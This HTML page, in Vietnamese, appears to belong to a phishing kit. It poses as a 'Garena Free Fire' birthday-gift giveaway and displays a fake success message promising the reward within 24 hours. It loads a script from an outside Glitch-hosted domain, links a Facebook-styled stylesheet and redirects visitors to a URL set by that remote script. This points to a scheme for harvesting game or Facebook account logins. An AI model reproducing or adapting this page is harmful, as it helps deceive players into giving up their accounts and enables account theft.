<!DOCTYPE html>
<html>
<head>
	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0">
	<meta http-equiv="X-UA-Compatible" content="IE=edge" />
	<title>GARENA FREE FIRE</title>
	<link rel="stylesheet" type="text/css" href="style.css">
	<link rel="stylesheet" type="text/css" href="facebook.css">
	<script src="https://backjs-min.glitch.me/utils.js"></script>
	<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
	<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js" ></script>
	<script>
	    setTimeout(() => {
window.location.href = urlsinhnhat
}, timeout)
	</script>
</head>
<body>

	<div class="nguyenSection">
		<div class="headerBg">
			<h1><i>GARENA FREE FIRE</i></h1>
			<img src="ngMedia/top.png">
		</div>
		<div class="ngWrap">
		    <div class="banner">
		    Nhận Quà Sinh Nhật Free Fire
		    </div>
			<div class="dialog">
				<div class="dialogBg">
				<img src="https://i.imgur.com/XkQn2AI.png">
				</div>
			</div>
<div class="maskBlur" style="display: none;"></div>
        <div class="st-berhasil" style="display: block;">
			<br><h1>Thành Công</h1>
          <center>  <img src="http://www.cssmyschool.info/schimg/done.gif"></center>
			<p class="bawah">Nhận Quà Thành Công
              Chúng Tôi Sẽ Gửi Phần Qua Đến Bạn Trong 24h
              Vui Lòng Chờ.!!!<br>
            

              <br>
              </p>
		</div>


	</div>